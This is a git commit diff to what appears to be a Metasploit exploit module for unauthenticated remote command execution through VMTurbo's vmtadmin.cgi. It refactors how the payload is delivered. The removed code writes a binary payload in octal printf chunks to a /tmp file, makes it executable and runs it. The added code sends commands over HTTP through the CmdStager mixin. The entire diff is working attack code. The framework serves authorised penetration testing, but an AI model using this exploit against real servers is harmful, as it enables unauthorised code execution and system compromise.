Simplify payload upload using 'CmdStager' mixin

epinna · epinna · commit f71589f534bb · 2014-08-12T10:49:17.000+02:00
diff --git a/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb b/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
@@ -9,8 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::EXE
-  include Msf::Exploit::FileDropper
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(update_info(info,
@@ -64,6 +63,8 @@ def initialize(info = {})
       ],
       'DefaultTarget'  => 1
       ))
+
+    deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
   end
 
   def check
@@ -98,7 +99,7 @@ def check
     end
   end
 
-  def request(cmd)
+  def execute_command(cmd, opts)
     begin
     res = send_request_cgi({
       'uri'    => '/cgi-bin/vmtadmin.cgi',
@@ -113,88 +114,16 @@ def request(cmd)
       vprint_error("#{peer} - Failed to connect to the web server")
       return nil
     end
-    vprint_status("Sent command #{cmd}")
-    res
-  end
-
-
-  def unix_stager(data)
-
-    file_name = "/tmp/#{rand_text_alphanumeric(4+rand(4))}"
-
-    unix_upload(file_name, data)
-    register_file_for_cleanup(file_name)
-
-    request("/bin/chmod +x #{file_name}")
-    request("#{file_name}&")
-  end
-
-  def unix_upload(file_name, data, append=false)
-    # This file uploader is used as early stager and follows the core
-    # function _write_file_unix_shell() in lib/msf/core/post/file.rb
-
-    redirect = (append ? '>>' : '>')
-
-    # Short-circuit an empty string. The : builtin is part of posix
-    # standard and should theoretically exist everywhere.
-    if data.length == 0
-      request(": #{redirect} #{file_name}")
-      return
-    end
-
-    d = data.dup
-    d.force_encoding('binary') if d.respond_to? :force_encoding
 
-    chunks = []
-    command = nil
-    cmd_name = ''
-
-    # Conservative.
-    line_max = 512
-    # Leave plenty of room for the filename we're writing to and the
-    # command to echo it out
-    line_max -= file_name.length
-    line_max -= 64
-
-    command = %q(/usr/bin/printf 'CONTENTS')
-
-    # each byte will balloon up to 4 when we encode
-    # (A becomes \x41 or \101)
-    max = line_max / 4
-
-    i = 0
-    while i < d.length
-      slice = d.slice(i...(i + max))
-      chunks << Rex::Text.to_octal(slice)
-      i += max
-    end
-
-    print_status("Sending payload to #{file_name} writing #{d.length} bytes in #{chunks.length} chunks of #{chunks.first.length} bytes")
-
-    # The first command needs to use the provided redirection for either
-    # appending or truncating.
-    cmd = command.sub('CONTENTS') { chunks.shift }
-    request("#{cmd} #{redirect} '#{file_name}'")
-
-    # After creating/truncating or appending with the first command, we
-    # need to append from here on out.
-    chunks.each { |chunk|
-      vprint_status("Next chunk is #{chunk.length} bytes")
-      cmd = command.sub('CONTENTS') { chunk }
-
-      request("#{cmd} >> '#{file_name}'")
-    }
-    true
+    vprint_status("Sent command #{cmd}")
   end
 
   def exploit
 
-    #
     # Handle single command shot
-    #
     if target.name =~ /CMD/
       cmd = payload.encoded
-      res = request(cmd)
+      res = execute_command(cmd)
 
       unless res
         fail_with(Failure::Unknown, "#{peer} - Unable to execute payload")
@@ -204,13 +133,7 @@ def exploit
       return
     end
 
-    @pl = generate_payload_exe
-
-    unless @pl
-      fail_with(Failure::BadConfig, "#{peer} - Please set payload before to run exploit.")
-      return
-    end
-
-    unix_stager(@pl)
+    # Handle payload upload using CmdStager mixin
+    execute_cmdstager({:flavor => :printf})
   end
 end
